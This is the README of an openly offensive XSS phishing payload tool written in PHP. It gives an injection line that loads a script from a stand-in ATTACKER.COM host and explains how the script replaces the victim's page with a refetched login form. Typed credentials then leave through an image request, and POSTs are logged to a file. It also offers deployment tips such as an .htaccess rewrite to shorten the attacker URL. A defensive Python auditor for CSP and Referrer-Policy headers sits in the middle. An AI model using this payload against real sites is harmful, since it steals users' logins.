XSS Phishing Attack Tool.

This README applies specifically to the PHP version of this script.
There is a Python version which acts the same, but has XML logging.
The Python version does not yet have the same options as the PHP version.

## Explanation

This is not an exploit tool; it's more of a payload tool.
Once you've found the exploit and you're able to inject JavaScript,
just stick this in there:


	<script src="http://ATTACKER.COM/thebiz.php"></script>

You're pretty much set.

## What exactly this does...

1) The page is loaded with the script inconspicuously placed.
2) Once the script is hit, the script will look at the HTTP Referer.
3) With the HTTP Referer in hand, it uses file_get_contents() to fetch the
   URL [the only fetch method supported at this time; cURL and Socket support will be added later].
4) Since the server doesn't have the authentication that the user does (presumably), the
   server is sent an unauthenticated page, which often contains a form to log in.
5) All the returned data is filtered and escaped, making it possible to embed it into JavaScript.
6) As soon as the JavaScript, with the payload, is returned to the user, the browser replaces everything
   in <body> with what was returned within the JavaScript. Forms are then modified to have an onSubmit="" handler.
7) When you submit, it loads an image with the input fields as GET parameters. sleep() is called (it sucks, gotta replace it.)
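As an added example from the defender's side (not part of this tool), the following Python audits a site's response headers for the three things the sequence above depends on: a script-src that allows any host (step 1), an img-src that allows any host (step 7), and a Referrer-Policy that sends the full page URL cross-origin (steps 2 and 3). The header sets are constructed samples, not captured from any real site.

```python
from typing import Dict, List

# Referrer-Policy values that keep the full page URL from a cross-origin host.
SAFE_REFERRER_POLICIES = {
    "no-referrer", "same-origin", "origin", "origin-when-cross-origin",
    "strict-origin", "strict-origin-when-cross-origin",
}

def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        parts = directive.strip().lower().split()
        if parts:
            policy[parts[0]] = parts[1:]
    return policy

def allows_arbitrary_origin(policy: Dict[str, List[str]], directive: str) -> bool:
    """True if `directive` (or its default-src fallback) lets the browser fetch from any host."""
    sources = policy[directive] if directive in policy else policy.get("default-src")
    if sources is None:
        return True  # no CSP at all, or no directive that covers this fetch type
    # '*' or a bare scheme matches every host; 'self', 'none' and named hosts do not.
    return any(src in ("*", "http:", "https:") for src in sources)

def audit(headers: Dict[str, str]) -> List[str]:
    """Report which steps of the payload sequence above these response headers leave open."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = parse_csp(h.get("content-security-policy", ""))
    findings = []
    if allows_arbitrary_origin(csp, "script-src"):
        findings.append("script-src: step 1, the injected <script src> may load from any host")
    if allows_arbitrary_origin(csp, "img-src"):
        findings.append("img-src: step 7, the image beacon may carry form fields to any host")
    if h.get("referrer-policy", "").strip().lower() not in SAFE_REFERRER_POLICIES:
        findings.append("referrer-policy: steps 2-3, the full page URL reaches the script host")
    return findings

# Constructed sample headers (not captured from any real site).
WEAK_HEADERS = {"Content-Type": "text/html"}  # no CSP, no Referrer-Policy
HARDENED_HEADERS = {
    "Content-Type": "text/html",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; img-src 'self'",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}

if __name__ == "__main__":
    for name, headers in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(name, audit(headers) or ["all three preconditions mitigated"])
```

A named host allowlist (e.g. `script-src https://cdn.example.com`) is reported as closed because the attacker's host is not on it; that only holds as long as the allowlisted host itself is trustworthy.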

## A few things

# Requirements

In php.ini:
	allow_url_fopen = On
For now. I'll add in support for cURL and Socket later.

Proper HTTP Referer headers sent by the victim. If this is spoofed or disabled, there will be odd results.

JavaScript must be enabled.

By default, the script will grab anything from $_POST and throw it in a file labeled "posts".
Create that file, and make it writable but non-readable. Right now there's no functionality to
forward posts from the server-spoofed page, but that will change in the future, and adding it
manually isn't hard.

# Future plans

Expanded support for passing proper browser headers, instead of PHP's headers.
cURL and Socket support, because it's probably faster.
Caching. (Save the page, then serve that until X minutes/hours/days have passed, then recache it.)

# Anything else?

I suggest using .htaccess, or some other method, to slim down the URL:
	RewriteRule ^a$ man-just-left-of-middle/thebiz.php
This will make http://ATTACKER.COM/a the script, and it will execute as normal, just with a rewritten URL.

Will not work with URL redirection, because the HTTP Referer is stripped.

Check the LICENSE file for licensing, GPLv2, etc etc.

WARNING: I have not completely bug tested this against vulns. I might have made a stupid mistake somewhere.
This is also doing some bandwidth-intensive actions (well, compared to none at all.)
Mileage may vary.

## Author

Kyle "Kos" Osborn